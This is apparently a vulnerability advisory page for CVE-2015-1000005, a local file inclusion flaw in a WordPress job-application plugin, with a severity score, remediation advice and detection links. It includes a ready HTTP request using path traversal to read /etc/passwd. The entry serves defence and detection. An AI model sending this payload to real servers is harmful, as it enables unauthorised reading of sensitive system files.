🔙 목록으로 돌아가기

CVE-2015-1000005: WordPress Candidate Application Form <= 1.3 - Local File Inclusion

TitleWordPress Candidate Application Form <= 1.3 - Local File Inclusion
AuthordhiyaneshDK
SeverityHigh
ImpactAn attacker can exploit this vulnerability to read sensitive files on the server.
RemediationUpdate to the latest version of the plugin.
CVSS Score7.5
EPSS Score0.21197
CVE IDCVE-2015-1000005
CWE IDCWE-22
Tags cve2015 cve wpscan wordpress wp-plugin lfi wp candidate-application-form_project vuln

🔍 Vulnerability Description

WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks.

🌐 HTTP Request

GET /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-1000005.yaml

🦈 Packet Capture: ⬇️ Download cve-2015-1000005.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A